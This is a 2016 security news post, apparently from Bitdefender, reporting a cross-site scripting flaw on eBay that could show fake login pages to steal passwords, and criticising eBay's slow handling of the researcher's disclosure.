eBay XSS Flaw: How Websites Might Help Criminals Phish Customers’ Passwords

Reading time: 6 min
Share this Share on email Share on twitter Share on linkedin Share on facebook

It’s 2016, and it would be nice to think that after several years of doing business online, companies have got a better handle on how to protect their websites from attacks.

I’m afraid I have depressing news for you.  Many sites are continuing to make big mistakes.

Well-known threats like cross-site scripting (XSS) attacks continue to challenge many websites, including household names.

Take eBay, for instance.

As Motherboard reports, a security researcher going by the name of MLT discovered a critical XSS flaw on eBay’s website in early December, which could allow malicious hackers to create fraudulent login pages and steal passwords.

As far as the user is concerned, they have clicked on a link to the main ebay.com site and are being asked by eBay to enter their password.  Even sceptical users who check the browser bar will probably be reassured that the password request is legitimate because they see ebay.com as the domain they are visiting. 

MLT has even produced a YouTube video demonstrating the XSS attack against eBay for non-believers, showing how simple it would be to trick users into handing over their passwords to hackers.



If MLT had had malicious intentions he could have spammed thousands if not millions of eBay users, inviting them to click on a link and would have almost certainly scooped up many passwords in the process.

As well as stealing login credentials, the flaw could have also been abused to infect visiting computers with malware.

Instead, MLT chose to inform eBay of the problem on December 11th.

But that is when the next failure happened.

MLT claims that eBay initially responded the following day requesting further details of the flaw, but didn’t respond to any more of the researcher’s emails, and only fixed the vulnerability last week when reporters from Motherboard got in touch.

A XSS flaw which can easily mimic the real eBay login page, and could be abused to target millions of eBay users, is something that should be tackled as a high priority by the company’s security team.  A researcher shouldn’t have to ask for help from a media outlet to get a serious bug like this fixed.

In other words, it’s not just about ensuring your website is secure in the first place.  It’s also about handling reports of vulnerabilities in a timely professional manner, keeping researchers informed as to what you’re doing to fix them and protect your customers.

It’s not as though eBay hasn’t suffered from XSS security flaws in the past.

The flaw MLT discovered should be, of course, entirely impossible on a securely-coded website.

But web programmers are human, and they make mistakes.  Only through the combination of coding experience, code auditing and penetration testing can you feel more confident that your site isn’t one of those exhibiting such a common problem and making life easy for computer criminals and identity thieves.

If major websites like eBay can’t seem to get its act together – what chance is there that other sites with smaller coding teams will have got things right?

The good news is that there is no indication that the cross-site scripting flaw found on eBay’s website was exploited by criminals.  But websites like XSSposed, which collect details of vulnerable sites and online applications, demonstrate that the problem is widespread and showing no signs of going away.

Regardless of whether you are running a site used by millions of people, or only get a few hundred visitors a day, it is essential that your website has been built with care, and does not contain security flaws that could be exploited by malicious hackers.

And, finally, if and when a flaw is found on your website, it’s critical that you fix it as soon as possible.  eBay was lucky that its XSS flaw was found by a responsible researcher and doesn’t appear to have been exploited – you might not be so lucky.


Virtualization and Cloud Security News from Bitdefender